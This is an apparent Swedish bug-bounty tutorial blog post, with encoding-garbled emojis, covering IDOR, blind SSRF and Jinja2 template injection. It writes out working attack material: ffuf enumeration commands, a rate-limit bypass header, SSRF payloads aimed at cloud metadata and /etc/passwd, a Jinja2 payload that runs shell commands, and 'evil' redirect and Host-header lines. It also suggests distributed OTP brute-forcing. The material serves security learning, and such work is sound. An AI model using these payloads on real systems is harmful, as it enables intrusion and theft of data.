đ Bug Hunting i Vildmarken: En Guide till Avancerade SĂ€kerhetshĂ„l & Bountyjakt
Idag dyker vi ner i en Ă€kta pentest-guldgruva â en samling buggar som skulle fĂ„ vilken bugbounty-jĂ€gare som helst att darra av iver. TĂ€nk dig sjĂ€lv som en modern Indiana Jones, fast istĂ€llet för reliker jagar du CVSS-poĂ€ng och kritiska sĂ„rbarheter. Dags att grĂ€va!
đ 1 · IDOR i Filexport-API:t â Din Nyckel till Andras Dokument #
Snabbfakta đ CWE: 639 | đŻ CVSS: 8.6 | đ ïž Verktyg: FFUF
Vad Àr problemet?
IDOR (Insecure Direct Object Reference) Ă€r som en universellnyckel till ett hotell â gissar du rĂ€tt dörrnummer (doc_id
), kan du sno andras PDF:er.
SÄ hÀr gör du:
- FÄnga dokument-ID:n frÄn din egen export-URL:
/api/export?doc_id=1001 # Kopiera, redigera, testa!
- Brute-force:a smart: Börja med ID:n nÀra ditt eget (±100) och skala upp:
ffuf -w 1-1050.txt -u "https://target.com/api/export?doc_id=FUZZ"
- Hitta PDF:er dÀr
owner_id
â din â grattis, du har kringgĂ„tt RBAC!
Pro-tips: LĂ€gg till
X-Original-IP: 127.0.0.1
för att smyga förbi rate limits.
đ 2 · Blind SSRF i Webhook-endpointen â En Lögnaktig BudbĂ€rare #
Snabbfakta
đ CWE: 918 | đŻ CVSS: 8.2 | đŁ Payloads: 169.254.169.254
Vad hĂ€nder? Webhooken Ă€r som en trojansk budbĂ€rare â den kan skicka meddelanden vart som helst, inklusive till interna nĂ€tverk eller AWS-metadata.
Exploateringssteg:
ffuf -w cloud-provider-ips.txt -u "https://target.com/webhook/submit?callback_url=http://FUZZ"
- BĂ€sta payloads:
file:///etc/passwd
http://foo%40bar@internal-ip
(credential-injection!)
- BekrĂ€fta med Burp Collaborator â ser du DNS-trĂ€ff? Jackpot!
â ïž 3 · Mall-RCE via Jinja2 SSTI â NĂ€r Mallar Blir Dödliga #
Snabbfakta đ CWE: 94 | đŻ CVSS: 9.8 | đ Impact: Full RCE
SĂ„ funkar det: Jinja2-mallmotorn Ă€r som en marionett â kontrollerar du snörena (mallinput), kan du fĂ„ systemet att dansa efter dina villkor.
Testa sandboxen:
{{7*7}} â 49? DĂ„ Ă€r det kört!
Eskalera till RCE:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Automatisera med en Nuclei-mall â sĂ€tt pĂ„ popcornen och se shell:en rulla in.
⥠4 · Sex Bonus-Buggar pĂ„ 60 Sekunder â Snabbjakt för Stressade Hackare #
Bug | Snabblösning |
---|---|
Clickjacking | <iframe transparent över "Radera konto" â saknas X-Frame-Options ? Bingo! |
Pre-Account Takeover | Radera kontot â sessionen lever kvar. GET /api/profile = gratis Ă„tkomst. |
OAuth Redirect | redirect_uri[]=valid&redirect_uri[]=evil â validerar bara första. Lurigt! |
Host-Header Poison | Host: evil.com i Ă„terstĂ€llningslĂ€nk â lĂ€nk till din domĂ€n. |
đ§° Rekommenderad Verktygsstack â Din Bounty-Motor #
Burp Suite 2023.6+ # Param-Miner + Collaborator = SSRF-magi
FFUF 2.0.0 # Fuzz:a parametrar, headers OCH paths samtidigt
Nuclei 3.0+ # Anpassade mallar för SSTI/SSRF
Hydra + AWS-spots # Distribuerad OTP-brute med 50 instanser
đ° Triage-Prioritering: SĂ„ FĂ„r Du Max Payout #
- Mall-RCE â Critical (đ°đ°đ°)
- SSRF â AWS Creds â High (đ°đ°)
- IDOR med Mass-Exfil â Medium-High
- OAuth Redirect â Snabb fix, bra bounty
â Slutchecklista: SĂ„ GodkĂ€nns Din Rapport #
- đž SkĂ€rmdumpar + Video-PoC â “Jag ser
uid=0(root)
i terminalen” - đ· CVSS + MITRE-ID direkt i rapporten â undvik 10 uppföljningsmejl
- đ§Ș Repeterbara kommandon â
curl -H "X-Original-IP: 127..."
- đ« Beskriv WAF-kringgĂ„ng â utvecklarna Ă€lskar tekniska detaljer!
đŻ Avslutning: FrĂ„n Bug till Bounty #
Bugbounty Ă€r en konst â det handlar om att se system med nya ögon. Varje endpoint Ă€r en potentiell dörr, varje parameter en nyckel. NĂ€sta gĂ„ng du ser en Jinja2-mall eller ett doc_id
, tÀnk: Vad hÀnder om jag pushar grÀnserna?
Ditt uppdrag: Ăppna Burp, vĂ€lj ett mĂ„l, och prova en teknik frĂ„n guiden. Som man sĂ€ger â den som inte vĂ„gar, fĂ„r ingen RCE. đ
Lycka till, och kom ihĂ„g: Etisk hacking Ă€r som en bra relation â kommunikation, respekt och massvis med curl-kommandon. đ„ïžđ
[Skrivet av en bugbounty-jÀgare som en gÄng kraschade en SaaS-plattform med en felaktigt URL-kodad emoji. True story.]